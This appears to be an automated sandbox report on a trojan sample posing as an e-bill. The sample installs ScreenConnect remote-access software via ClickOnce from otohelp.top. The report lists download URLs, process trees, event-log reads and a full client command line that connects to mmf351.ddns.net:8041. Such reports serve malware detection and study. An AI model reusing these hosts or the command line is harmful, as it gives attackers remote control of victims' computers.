Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B62A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsClient.exe
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2609149253.000001F6D0879000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B6068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsClient.exe.config
Source: dfsvc.exe, 00000001.00000002.2607141930.000001F6D01C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsClient.exeuy
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsFileManag
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.e
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2609149253.000001F6D0879000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B6068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2609149253.000001F6D0879000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B6068000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config
Source: dfsvc.exe, 00000001.00000002.2609149253.000001F6D0879000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config(
Source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B62A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://otohelp.top/Bin/ScreenConnect.x

Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 79.110.49.16:443 -> 192.168.2.4:49731 version: TLS 1.2

E-Banking Fraud

Drops certificate files (DER)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141	Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security

Reads the System eventlog

Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: E_BILL9926378035.exe

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp			Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

Detected potential crypto function

Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Code function: 0_2_00EFA495	0_2_00EFA495
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8B0FB0	1_2_00007FFD9B8B0FB0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B89AEF5	1_2_00007FFD9B89AEF5
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8BAD85	1_2_00007FFD9B8BAD85
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8A3369	1_2_00007FFD9B8A3369
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B89FA11	1_2_00007FFD9B89FA11
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8B2900	1_2_00007FFD9B8B2900
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B891211	1_2_00007FFD9B891211
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B896138	1_2_00007FFD9B896138
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8B3061	1_2_00007FFD9B8B3061
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Code function: 11_2_01CB87A9	11_2_01CB87A9
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9B8970BD	12_2_00007FFD9B8970BD
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9B8910D7	12_2_00007FFD9B8910D7
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9B8910CF	12_2_00007FFD9B8910CF
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBAD9F2	12_2_00007FFD9BBAD9F2
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBAD12D	12_2_00007FFD9BBAD12D
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA5944	12_2_00007FFD9BBA5944
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA5731	12_2_00007FFD9BBA5731
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA5F8A	12_2_00007FFD9BBA5F8A
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA5D9C	12_2_00007FFD9BBA5D9C
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA64D2	12_2_00007FFD9BBA64D2

One or more processes crash

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1928 -ip 1928

Uses 32bit PE files

Source: E_BILL9926378035.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'

Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal69.troj.evad.winEXE@17/74@2/2

Source: C:\Users\user\Desktop\E_BILL9926378035.exe

0_2_00EF1000

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

File created: C:\Users\user\AppData\Local\Deployment

Jump to behavior

Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1928
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

File created: C:\Users\user\AppData\Local\Temp\Deployment

Jump to behavior

Source: C:\Users\user\Desktop\E_BILL9926378035.exe

Command line argument: dfshim

0_2_00EF1000

Source: E_BILL9926378035.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\E_BILL9926378035.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: E_BILL9926378035.exe	ReversingLabs: Detection: 18%
Source: E_BILL9926378035.exe	Virustotal: Detection: 14%

Source: unknown	Process created: C:\Users\user\Desktop\E_BILL9926378035.exe "C:\Users\user\Desktop\E_BILL9926378035.exe"
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1928 -ip 1928
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 856
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe"
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=89e470af-f42d-4b2f-ad1d-717711c7c76a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
Source: unknown	Process created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=89e470af-f42d-4b2f-ad1d-717711c7c76a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe" "RunRole" "03b72f57-2802-4bff-bb34-56b3497bf3fc" "User"
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1928 -ip 1928	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 856	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=89e470af-f42d-4b2f-ad1d-717711c7c76a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe" "RunRole" "03b72f57-2802-4bff-bb34-56b3497bf3fc" "User"

Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: srvcli.dll	Jump to behavior
